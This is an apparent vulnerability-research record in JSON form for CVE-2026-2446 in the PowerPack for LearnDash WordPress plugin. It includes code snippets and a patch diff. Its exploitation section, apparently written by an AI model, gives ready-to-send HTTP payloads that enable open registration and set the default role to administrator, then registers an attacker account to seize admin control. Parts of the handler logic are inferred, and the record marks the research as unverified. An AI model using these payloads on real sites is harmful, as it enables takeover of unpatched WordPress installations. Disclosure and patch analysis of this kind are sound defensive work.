[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fsg679nNyR9O3W6SGSdUUfImjKLLnVbH65mE2w-NpejM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":31,"research_vulnerable_code":32,"research_fix_diff":33,"research_exploit_outline":34,"research_model_used":35,"research_started_at":36,"research_completed_at":37,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":38},"CVE-2026-2446","powerpack-for-learndash-unauthenticated-arbitrary-options-update","Powerpack for LearnDash \u003C= 1.2.0 - Unauthenticated Arbitrary Options Update","The PowerPack for LearnDash plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the [function-name] function in all versions up to, and including, 1.2.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","powerpack-for-learndash",null,"\u003C=1.2.0","1.3.0","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-02-13 00:00:00","2026-05-04 14:53:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4c5c757f-8546-4a95-a9f4-92d59106aa83?source=api-prod",81,[22,23,24,25,26],"assets\u002Fcss\u002Fadmin\u002Flearndash-style.css","assets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js","includes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php","includes\u002Favailable_classes\u002Fclass-learndash-powerpack-all-classes.php","includes\u002Fclass-learndash-powerpack-setting-page.php","researched",false,3,"# Vulnerability Analysis: CVE-2026-2446 - PowerPack for LearnDash Unauthenticated Arbitrary Options Update\n\n## 1. Vulnerability Summary\nThe **PowerPack for LearnDash** plugin (up to version 1.2.0) contains a critical vulnerability where the AJAX handler for saving class settings lacks both a capability check and nonce verification. This allows an unauthenticated attacker to trigger the update of arbitrary WordPress options by sending a crafted POST request to `admin-ajax.php`.\n\nThe vulnerability resides in the function associated with the AJAX action `learndash_save_class_data_ajax`. While the source code for the PHP handler itself was not provided, the client-side implementation in `assets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js` and the vulnerability description confirm that user-supplied form data is processed and saved to the database without authorization.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `learndash_save_class_data_ajax`\n*   **Parameters:**\n    *   `action`: `learndash_save_class_data_ajax`\n    *   `class_name`: A string identifier for the setting group (e.g., `LearnDash_PowerPack_Settings`).\n    *   `formData`: An array of objects, where each object contains a `name` (the WordPress option key) and a `value` (the desired option value).\n*   **Authentication:** None (Unauthenticated). The plugin likely registers the hook via `wp_ajax_nopriv_learndash_save_class_data_ajax`.\n*   **Preconditions:** The plugin must be active.\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated user sends a POST request to `wp-admin\u002Fadmin-ajax.php` with the action `learndash_save_class_data_ajax`.\n2.  **AJAX Routing:** WordPress routes the request to the handler registered by the plugin (inferred function name: `learndash_save_class_data_ajax`).\n3.  **Vulnerable Logic (Inferred):**\n    *   The handler receives the `formData` array from `$_POST`.\n    *   The handler iterates through the elements of `formData`.\n    *   For each element, it extracts `name` and `value`.\n    *   **The Sink:** The handler calls `update_option( $item['name'], $item['value'] )` without verifying if the user has `manage_options` capabilities or if a valid nonce was provided.\n4.  **Impact:** The attacker can overwrite core WordPress settings, such as `users_can_register` and `default_role`.\n\n## 4. Nonce Acquisition Strategy\nBased on the provided source code in `assets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js`:\n*   The AJAX data object defined in the `.learndash_save_form_data` click handler **does not include a nonce parameter**.\n*   The localization object `learndash_powerpack_jquery_var` (registered in `class-learndash-powerpack-admin-assets.php`) only contains `ajax_url` and `ld_success_message`.\n*   **Conclusion:** The endpoint does not implement nonce verification. **No nonce is required for exploitation.**\n\n## 5. Exploitation Strategy\n\n### Step 1: Enable Open Registration and Set Default Role to Admin\nThe goal is to allow anyone to register and ensure new users are granted the `administrator` role.\n\n*   **HTTP Request (Playwright\u002Fhttp_request):**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=learndash_save_class_data_ajax&class_name=LearnDash_PowerPack_General_Settings&formData[0][name]=users_can_register&formData[0][value]=1&formData[1][name]=default_role&formData[1][value]=administrator\n    ```\n\n### Step 2: Register a New Account\nOnce the options are updated, the attacker can use the standard WordPress registration endpoint.\n\n*   **HTTP Request:**\n    ```http\n    POST \u002Fwp-login.php?action=register HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    user_login=attacker_admin&user_email=attacker@example.com&redirect_to=&wp-submit=Register\n    ```\n\n### Step 3: Verify and Access\nThe attacker checks their email for the registration link (in a test environment, this can be bypassed or checked via WP-CLI) and logs in as a full administrator.\n\n## 6. Test Data Setup\n1.  Install and activate **LearnDash LMS** (dependency).\n2.  Install and activate **PowerPack for LearnDash** version 1.2.0.\n3.  Ensure `users_can_register` is initially `0` (default).\n4.  Ensure `default_role` is initially `subscriber` (default).\n\n## 7. Expected Results\n*   The AJAX request should return a successful response (likely JSON containing `{\"success\": \"success\"}` or similar based on the JS logic).\n*   The WordPress options `users_can_register` will be updated to `1`.\n*   The WordPress option `default_role` will be updated to `administrator`.\n\n## 8. Verification Steps\nAfter performing the HTTP exploit, use WP-CLI to verify the state change:\n\n```bash\n# Check if registration is enabled\nwp option get users_can_register\n# Expected: 1\n\n# Check the default role\nwp option get default_role\n# Expected: administrator\n\n# (Optional) Verify the new user role if registered in Step 2\nwp user list --role=administrator\n```\n\n## 9. Alternative Approaches\nIf the `formData` structure is parsed differently by the plugin (e.g., if it expects a flat key-value pair instead of the `serializeArray` format), try a flattened payload:\n\n*   **Alternative Payload:**\n    ```http\n    action=learndash_save_class_data_ajax&class_name=LearnDash_PowerPack_General_Settings&users_can_register=1&default_role=administrator\n    ```\n\nIf the plugin filters which options can be updated based on the `class_name` (unlikely given the \"arbitrary options\" description), identify valid class names using:\n```bash\ngrep -r \"class LearnDash_PowerPack_\" .\n```\nAnd substitute the `class_name` parameter with one found (e.g., `LearnDash_PowerPack_Course_Settings`).","The PowerPack for LearnDash plugin for WordPress (up to version 1.2.0) is vulnerable to an unauthenticated arbitrary options update. The AJAX handler for saving settings lacks capability checks and nonce verification, allowing any user to modify WordPress configuration settings, such as enabling registration and setting the default role to administrator.","\u002F* assets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js lines 92-106 *\u002F\n        \u002F\u002Fajax save classes data\n        $(document.body).on(\n            'click',\n            \u002F\u002F eslint-disable-next-line max-len\n            '.learndash_save_form_data',\n            function (e) {\n                e.preventDefault();\n                var current_element = $(this);\n                var form = $('form.form_learndash_save_class_data');\n                var formData = form.serializeArray();\n                var data_class = $(this).attr('data-class');\n                var data = {\n                    'action': 'learndash_save_class_data_ajax',\n                    'class_name': data_class,\n                    'formData': formData,\n                };\n\n---\n\n\u002F* includes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php lines 68-76 *\u002F\n\t\t\twp_enqueue_script( 'learndash-powerpack-custom-jquery-func', LD_POWERPACK_PLUGIN_URL . '\u002Fassets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js', [ 'jquery' ], time(), true );\n\t\t\twp_localize_script(\n\t\t\t\t'learndash-powerpack-custom-jquery-func',\n\t\t\t\t'learndash_powerpack_jquery_var',\n\t\t\t\t[\n\t\t\t\t\t'ajax_url'           => admin_url( 'admin-ajax.php' ),\n\t\t\t\t\t'ld_success_message' => esc_html__( 'Data saved successfully.', 'learndash-powerpack' ),\n\t\t\t\t]\n\t\t\t);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.2.0\u002Fassets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.3.0\u002Fassets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.2.0\u002Fassets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js\t2021-05-01 20:07:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.3.0\u002Fassets\u002Fjs\u002Fadmin\u002Flearndash-powerpack-custom-jquery-func.js\t2022-01-26 14:07:42.000000000 +0000\n@@ -101,6 +113,7 @@\n \t\t\t\t\t'action': 'learndash_save_class_data_ajax',\n \t\t\t\t\t'class_name': dataClass,\n \t\t\t\t\t'formData': formData,\n+\t\t\t\t\t'nonce': modalNonce,\n \t\t\t\t};\n \t\t\t\t$(current_element).closest('div.modal').find('.learndash-powerpack-modal-content').addClass('learndash_powerpack_ajax_loader_form');\n \t\t\t\t$.post(learndash_powerpack_jquery_var.ajax_url, data, function (response) {\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.2.0\u002Fincludes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.3.0\u002Fincludes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.2.0\u002Fincludes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php\t2021-05-16 15:49:44.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpowerpack-for-learndash\u002F1.3.0\u002Fincludes\u002Fadmin_assets\u002Fclass-learndash-powerpack-admin-assets.php\t2022-01-26 14:07:42.000000000 +0000\n@@ -34,6 +34,7 @@\n \t\t\t?>\n-            \u003C!-- The Modal -->\n-            \u003Cdiv id=\"learndash-powerpack-modal\" class=\"modal\">\n+\t\t\t\u003C!-- The Modal -->\n+\t\t\t\u003Cdiv id=\"learndash-powerpack-modal\" class=\"modal\">\n+\t\t\t\u003C?php wp_nonce_field( 'learndash-powerpack-modal-nonce-' . get_current_user_id(), 'learndash-powerpack-modal-nonce' ); ?>\n \t\t\t\t\u003C!-- Modal content -->","The exploit targets the `\u002Fwp-admin\u002Fadmin-ajax.php` endpoint using the `learndash_save_class_data_ajax` action. An attacker sends a POST request without authentication or nonces. The payload includes a `formData` array containing key-value pairs where the keys are WordPress option names (e.g., 'users_can_register', 'default_role') and the values are the desired settings (e.g., '1', 'administrator'). Once these options are updated, the attacker can use the standard WordPress registration endpoint (`\u002Fwp-login.php?action=register`) to create a new account with administrative privileges.","gemini-3-flash-preview","2026-05-04 20:03:38","2026-05-04 20:04:34",{"type":39,"vulnerable_version":40,"fixed_version":11,"vulnerable_browse":41,"vulnerable_zip":42,"fixed_browse":43,"fixed_zip":44,"all_tags":45},"plugin","1.2.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-for-learndash\u002Ftags\u002F1.2.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpack-for-learndash.1.2.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-for-learndash\u002Ftags\u002F1.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpowerpack-for-learndash.1.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpowerpack-for-learndash\u002Ftags"]